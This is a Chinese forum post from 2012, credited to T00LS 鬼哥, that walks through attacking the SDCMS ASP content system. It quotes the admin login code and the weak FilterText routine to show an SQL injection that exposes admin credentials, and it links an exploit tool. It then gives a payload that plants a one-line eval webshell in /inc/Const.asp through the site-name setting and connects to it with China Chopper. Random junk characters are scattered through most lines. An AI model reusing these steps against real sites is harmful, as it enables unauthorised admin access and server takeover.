作者:T00LS 鬼哥
1 S( ~" a8 Z) v/ j" A# e2 \漏洞文件:后台目录/index.asp
+ U/ I' h3 h+ H' ^0 {; w6 x$ p3 W, W, X
Sub Check- W- `+ s$ a+ m9 \8 G" G- o
Dim username,password,code,getcode,Rs# g' w3 t* ~/ w# M$ i
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub3 R, l1 C& C% o( @8 l" e
username=FilterText(Trim(Request.Form("username")),1)" G. g, w4 t4 V( O
password=FilterText(Trim(Request.Form("password")),1)& l9 \( F3 O2 `* K
code=Trim(Request.Form("yzm"))
' R5 e j: F/ P) z- ]/ ` getcode=Session("SDCMSCode")" g0 f" ]" s5 ?7 v
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died6 x, d: Z3 J' c0 C
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
" `- m, h v5 z' N* Z IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
$ P& ?( |( j; X& L% F* X IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
! G% C3 r) V) H IF username="" or password="" Then$ I( x3 V% A4 `7 U! L- {
Echo "用户名或密码不能为空"ied4 [1 i4 u3 R ?. b
Else* a9 |! l3 ?# B J5 o
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'") Q" C' v- [& [) n$ L8 r+ ?3 F
IF Rs.Eof Then S/ k6 T0 w( q- _* F& U
AddLog username,GetIp,"登录失败",14 P2 E. |5 U4 h! V D
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
5 c0 s \' C% s- F, n! k* b Else
m0 w$ B" k" \. i Add_Cookies "sdcms_id",Rs(0)
0 m) E( D. b& W8 Y: L+ Y Add_Cookies "sdcms_name",username( }1 @3 q3 i/ h
Add_Cookies "sdcms_pwd",Rs(2)' \0 M& B# ], h7 X- U6 @* j; e
Add_Cookies "sdcms_admin",Rs(3)
9 u9 J: C0 Z& K1 _+ z$ v Add_Cookies "sdcms_alllever",Rs(4)
5 k4 v2 t: n4 X' o4 @9 s Add_Cookies "sdcms_infolever",Rs(5)
# ?5 Q) ]1 w- W$ F- m Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")5 A F0 l7 ^# e1 I: {: [$ n _2 ^2 c
AddLog username,GetIp,"登录成功",17 U3 X, F) V0 @- @& |
'自动删除30天前的Log记录
0 ^* D/ e/ H- P0 g4 g2 |! Y IF Sdcms_DataType Then
, ]% V A% H4 v, i3 B* B Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
: g/ g2 u1 \# W( P4 ^ Else
( j2 B; A& f; T/ Z; l: n7 Z) E7 X Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
! M7 O! h3 }9 _% N" } End IF: c! ^. D' H7 F$ K6 l; `" f8 P
Go("sdcms_index.asp"), o: B' g6 ^/ H6 ^
End IF4 S! n0 V5 ~0 h' X& L
Rs.Close; Z: q2 s4 R9 C ?, u
Set Rs=Nothing2 ?& }; D1 A5 X' Y
End IF/ N/ ~5 w' e7 B" I4 {
End Sub) d0 ^ s3 e3 r. P9 q0 [
a+ o* ~3 j5 J% `
’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
* Z+ o7 p/ S( H0 d* r3 R- e
4 E" \% Z. g4 Q. ]Function FilterText(ByVal t0,ByVal t1)8 ~" y) K' i" f; n$ H
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function6 H! s$ f5 |- }
t0=Trim(t0)# l( m( p: Z7 z5 }) I6 Z1 o* O
Select Case t1% l1 R) x2 o7 k' M0 b6 S
Case "1"
! n; G" l+ |) F# ~ t0=Replace(t0,Chr(32),"")
( s3 f0 h9 R9 Y4 M) p7 Y; S3 b0 \" E- g t0=Replace(t0,Chr(13),"")
1 [! u" t. v3 ~- I ]# I t0=Replace(t0,Chr(10)&Chr(10),"")
( |) d- i% R, B; t! w, F t0=Replace(t0,Chr(10),"")8 L8 a: F( E8 y7 g- a
Case "2"* n* }2 l! m) H* v6 u* Z
t0=Replace(t0,Chr(8),"")'回格
8 S7 o) i% }3 a; S4 s# k2 A5 ] t0=Replace(t0,Chr(9),"")'tab(水平制表符)
3 P3 R7 w, \" y1 H [: Q t0=Replace(t0,Chr(10),"")'换行7 z+ c: v8 [1 Q0 g. l8 v2 X2 m' C' o
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)5 ~" @: J+ Y! x: K& y0 G
t0=Replace(t0,Chr(12),"")'换页8 k1 `9 Q; D5 O' g8 w- z
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
' w1 e/ |. n) o/ E! ?" t t0=Replace(t0,Chr(22),"")
1 M6 o0 V8 _$ y, P t0=Replace(t0,Chr(32),"")'空格 SPACE* C6 ?; X4 X' Q! h1 N7 [4 g
t0=Replace(t0,Chr(33),"")'!4 n1 j# h! w% f% K* r$ ]
t0=Replace(t0,Chr(34),"")'"6 W1 y7 g V" ?, w
t0=Replace(t0,Chr(35),"")'#
, v3 \6 t z9 ^: V; a t0=Replace(t0,Chr(36),"")'$
1 W$ B& J/ O) o3 `, J t0=Replace(t0,Chr(37),"")'% i, @$ Y+ z& o0 [, `
t0=Replace(t0,Chr(38),"")'&2 N2 {8 ^0 O+ m% n1 U- V5 x, W5 ~
t0=Replace(t0,Chr(39),"")''; r d4 y$ u% L0 C- c/ B) I7 |
t0=Replace(t0,Chr(40),"")'(
' y! |" ?" Z( D& S7 Z' j7 T t0=Replace(t0,Chr(41),"")')
! }0 T& B! I) U5 c. Q" m5 H t0=Replace(t0,Chr(42),"")'*
5 [5 v n1 j% w' j2 _% I3 o" @ t0=Replace(t0,Chr(43),"")'+
% y- m( v t: r) z t0=Replace(t0,Chr(44),"")',
/ T3 Z% E J+ T) \1 }5 M t0=Replace(t0,Chr(45),"")'-
+ v0 @5 ^. w) L) d# Z9 g' L; y8 C t0=Replace(t0,Chr(46),"")'.+ B+ ?, q" i# M8 O4 E( O
t0=Replace(t0,Chr(47),"")'/
$ G8 j0 Y' Y& i# B, M1 `' t t0=Replace(t0,Chr(58),"")':
9 j0 L& ?! m) j% [/ h t0=Replace(t0,Chr(59),"")';% i( H" S% a1 G& _
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>( E: ]5 p s- L) N
t0=Replace(t0,Chr(63),"")'?
1 I; _, V2 f) M0 _# ~ t0=Replace(t0,Chr(64),"")'@
( R% r8 M4 U8 l9 [( |# b! [ t0=Replace(t0,Chr(91),"")'\
4 P6 h O d! f- b, X t0=Replace(t0,Chr(92),"")'\9 M2 H% K, F- h L. V" [
t0=Replace(t0,Chr(93),"")']
7 ?: q6 R$ l* H* Y t0=Replace(t0,Chr(94),"")'^0 z/ ^# A B" g7 e! [( o4 h- Z
t0=Replace(t0,Chr(95),"")'_$ E2 w5 \ g5 Q! F5 K1 X
t0=Replace(t0,Chr(96),"")'`3 o4 _( I. M! [7 W5 E
t0=Replace(t0,Chr(123),"")'{
% S% r: s9 y1 N1 a t0=Replace(t0,Chr(124),"")'|* D; S' i* h& E0 ^" v7 Y* |4 {! E
t0=Replace(t0,Chr(125),"")'}7 r6 L1 B+ O4 G: B
t0=Replace(t0,Chr(126),"")'~, E* j% Q' m, ^8 U8 T7 j0 z
Case Else
1 v* |5 H- a. }! w& |8 U t0=Replace(t0, "&", "&"). i& h1 O( L8 q* [! `0 J
t0=Replace(t0, "'", "'")1 z5 S- I9 D( s) R4 ~ T
t0=Replace(t0, """", """)
/ d# h3 n6 R' M: u n! `! z+ n t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
- j) M: w5 {0 _3 P End Select, f. A8 [; N7 u2 P" D
IF Instr(Lcase(t0),"expression")>0 Then
( K% f! q4 m9 e t0=Replace(t0,"expression","e­xpression", 1, -1, 0)3 t# s Y4 {3 u$ S
End If
0 F9 M+ Y: u8 I4 S( Z8 X FilterText=t0- t+ J9 D: [; h
End Function! ` {' R$ w3 ~9 }: j' A9 G
8 K( a1 P3 }* ~5 y7 ]9 G3 ?0 a) w
看到没。直接参数是1 只过滤
1 J' D3 ~$ Y2 b% j( X' f7 { t0=Replace(t0,Chr(32)," ")
* Y7 B/ R+ r L4 H* `. x t0=Replace(t0,Chr(13),""); W8 d$ N0 h: l9 T- A
t0=Replace(t0,Chr(10)&Chr(10),"
# b4 r% W( {, F+ e) q" h0 W. N") |4 @2 L4 B. G4 _4 S- j
t0=Replace(t0,Chr(10),"
( C ?4 ~& D3 s")
6 p7 S8 ?( n8 n" k% {漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!% g7 f: Z/ [- t- \$ n+ x P
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
5 I% x; x# k6 `* ~5 k
# _" }& e& J4 {! j/ X8 G测试:
0 |+ W2 M8 T, o2 m. ~, n3 e! M
K* I, x: I# [! H' [9 J
6 r0 O$ s" k. q: H' ]现在输入工具上验证码,然后点OK2 \) g+ Z6 k# n( P, P
0 t2 A: Y, P# s3 u. Z5 a' v
% f! Q) ^: c# f8 Z看到我们直接进入后台管理界面了,呵呵!, i* O) }/ M& b5 s
- b) B8 z+ j+ L; B% R
/ q# e0 m3 ~$ Z# H6 [- U
4 q; j4 J+ {) y7 g& B9 d
这样直接进入后台了。。。。, L/ J6 y: |+ K
7 A! w7 ]% q9 o$ W' R0 b' h# Q
6 R7 O0 k; _& M5 v' W2 X: j
9 r Z: s$ R7 P3 w$ C0 R
SDCMS提权:9 ]- I! p. O( ~
( i4 \, W/ V8 M( @5 _方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?' D$ y" F) N5 p+ |2 P0 \. X8 ~' X
, t X- i" h( U8 y+ @9 C0 p7 A; t( w q
) ]7 Z1 T* ?, D$ C! t
OK,现在用菜刀连接下!
3 S5 @) _8 ^0 H- k$ W0 Z/ m+ b/ S/ M6 s) T# D
' c" S# @* Y1 J( U! X! Q3 L
" r: ? k1 k, I- Q * R3 c# L( S, W+ h
. e \$ H) H' ?; w G. m |
发表于 2012-11-9 20:57:02
收藏
支持
反对